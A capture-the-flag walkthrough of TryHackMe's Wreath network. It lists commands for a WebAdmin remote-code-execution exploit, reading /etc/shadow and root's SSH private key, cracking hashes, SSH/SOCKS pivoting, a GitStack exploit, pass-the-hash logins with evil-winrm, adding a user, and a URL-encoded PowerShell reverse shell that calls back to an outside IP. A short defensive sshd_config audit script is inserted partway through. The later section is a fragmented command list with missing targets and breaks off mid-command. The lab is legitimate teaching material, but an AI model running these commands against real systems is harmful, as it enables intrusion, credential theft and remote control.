
Complete TryHackMe Wreath Network Writeup

This TryHackMe Wreath Network walkthrough helps you learn how to pivot through a network by compromising a public-facing web machine and tunnelling your traffic to access other machines in Wreath's network. (Streak limitation only for non-subscribed users).

Access Wreath Network

Go to and download your VPN config file.

Before starting, let's create a folder to store all our files.

mkdir /home/kali/TryHackMe_Wreath

Enter the project folder:

cd /home/kali/TryHackMe_Wreath

Attacking Prod-Server

The production server is a Linux host. Let's use nmap to scan for open ports and verify which services are running.

Scan the Host

Scan the prod-server using nmap and verify which services are running on the remote machine.

nmap -sC -sV --script=vuln

Interesting result: the server is running an old WebAdmin version on port 10000.


Open Google and search for a WebAdmin exploit:

search webadmin 1.890

Download Exploit from here:


Exploit WebAdmin 1.890 arguments options:

Execute the Python script and verify the system process and user.

python3 10000 "id;whoami"

After verifying that we are root, let's work on getting remote access to the machine. Execute the same script, but this time read the /etc/passwd file:

python3 10000 "cat /etc/passwd"

Now we have a list of system users we can use. Notice the user twreath: what is his password hash?

python3 10000 "cat /etc/shadow"

Great, we have two user password hashes. Let's crack them.



Save both in password_hashes.txt

Crack The Hashes

If we pass the hash file to john without any other arguments, john will auto-detect the hash type.

john password_hashes.txt

Verify whether john cracked any password:

john --show password_hashes.txt

No success cracking the hashes?

If it was possible to read the shadow file, it may also be possible to extract root's SSH RSA private key. Let's try it!

Extract SSH Keys

Root SSH RSA Key

python3 10000 "cat /root/.ssh/id_rsa"

Copy the key content into the file prod-server.rsa and set the correct permissions:

chmod 600 prod-server.rsa

Log In to Prod-Server

Now we can log in to our production server. Here I will connect through SSH, creating a SOCKS5 proxy on port 19850. This proxy will allow us to access all networks and hosts that prod-server can access.

ssh -i /home/kali/TryHackMe_Wreath/prod-server.rsa root@ -D 19850

We are In as root 😀

Attack Prod-Server Description

We started by scanning the prod-server host with nmap and detected a vulnerable version of WebAdmin running on port 10000. We then searched Google for a public exploit and used it to get RCE on the remote server. With the script we were able to extract the root SSH RSA key, log in to prod-server as root, and create a SOCKS5 proxy.
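A defender's view of the steps summarised above, as an added example that is not part of the original writeup: a small Python audit of the global section of an sshd_config for the two settings that root key login and `ssh -D` depend on. The sample config is constructed, the function names are hypothetical, and Match blocks are deliberately not evaluated.

```python
# Added example: audit the global section of an sshd_config for the settings
# the walkthrough relied on (root login with a key, and ssh -D forwarding).

# OpenSSH defaults that apply when a keyword is absent from the file.
DEFAULTS = {"permitrootlogin": "prohibit-password", "allowtcpforwarding": "yes"}
ROOT_KEY_LOGIN = {"yes", "prohibit-password", "without-password"}
DYNAMIC_FORWARD = {"yes", "all", "local"}  # ssh -D uses client-side forwards

# Constructed sample config, not taken from the Wreath host.
SAMPLE_CONFIG = """\
Port 22
PermitRootLogin without-password
PasswordAuthentication no
#AllowTcpForwarding no
Match User backup
    AllowTcpForwarding no
"""

def effective_global_settings(config_text):
    """Return effective global values; sshd keeps the first occurrence of a keyword."""
    settings = dict(DEFAULTS)
    seen = set()
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        parts = line.replace("=", " ", 1).split()
        if not parts:
            continue
        keyword = parts[0].lower()  # keywords are case-insensitive
        if keyword == "match":
            break  # conditional blocks are out of scope for this check
        if keyword in DEFAULTS and keyword not in seen and len(parts) > 1:
            settings[keyword] = parts[1].lower()
            seen.add(keyword)
    return settings

def audit(config_text):
    """Return one finding per setting that permits a step from the writeup."""
    s = effective_global_settings(config_text)
    findings = []
    if s["permitrootlogin"] in ROOT_KEY_LOGIN:
        findings.append("PermitRootLogin %s: a stolen root key gives a root shell" % s["permitrootlogin"])
    if s["allowtcpforwarding"] in DYNAMIC_FORWARD:
        findings.append("AllowTcpForwarding %s: ssh -D can pivot through this host" % s["allowtcpforwarding"])
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```

An empty file still yields both findings, because the OpenSSH defaults permit root key login and TCP forwarding.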

Attacking Git Server

It's time to attack the Git Server, but before that let's configure proxychains so that we can use any tool against git-server.

If you want to use proxychains strict mode, comment out the socks4 entry and add only the socks5 one.

echo "socks5 127.0.0.1 19850" | sudo tee -a /etc/proxychains4.conf

An SSH proxy tunnel gives us a lot of flexibility when we are pivoting inside a network: we can keep a secure tunnel to our compromised machine and access any service on the network through it.

Using SSH and Proxychains

If we want to access the git server directly from our browser, we need to set up FoxyProxy to use the new SOCKS5 proxy created with the SSH tunnel.

Now we can access the Git Server directly in our browser.

Remember: any tool we use to attack the Git Server needs to go through our local SOCKS5 proxy (created with our SSH tunnel into the prod-server host).

After configuring FoxyProxy to use our proxy, open the git server IP in the browser.

We get an error page, but notice that it has some juicy info: it is using Django and mentions some new directories. Let's investigate it!

Scan Git Server with Nmap

proxychains4 nmap --top-ports 1023 -sT  -n -PS --script=vuln

As we know, GitStack is running on port 80, so let's search for an exploit using the searchsploit tool.

searchsploit gitstack

We found 3 possible GitStack exploits, let’s copy the third one into our current folder:

searchsploit -m php/webapps/
proxychains4 python
proxychains4 curl -X POST -d 'username=RFS;password=RFS'
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u RFS -p RFS -i
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u Administrator -H 37db63-RFS-a8461e05c-RFS -i
proxychains4 xfreerdp /v: /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share
firewall-cmd --zone=public --add-port 19850/tcp
firewall-cmd --zone=public --add-port 19851/tcp
scp -i key socat root@
./tmp/socat-rfs tcp-l:19851,fork,reuseaddr tcp:
proxychains4 curl -X POST -d 'a=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.193.200%27%2C19850%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22'
mkdir /home/kali/TryHackMe_Wreath/share
proxychains4 xfreerdp /v: /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share

Send Mimikatz through the file share or SCP

proxychains4 curl -X POST -d 'a=whoami'
proxychains4 curl -X POST -d 'a=net user RFS RFS /add'


Attacking WREATH-PC
Username: Thomas
Password - Crack the Hash
powershell.exe -c "(new-object
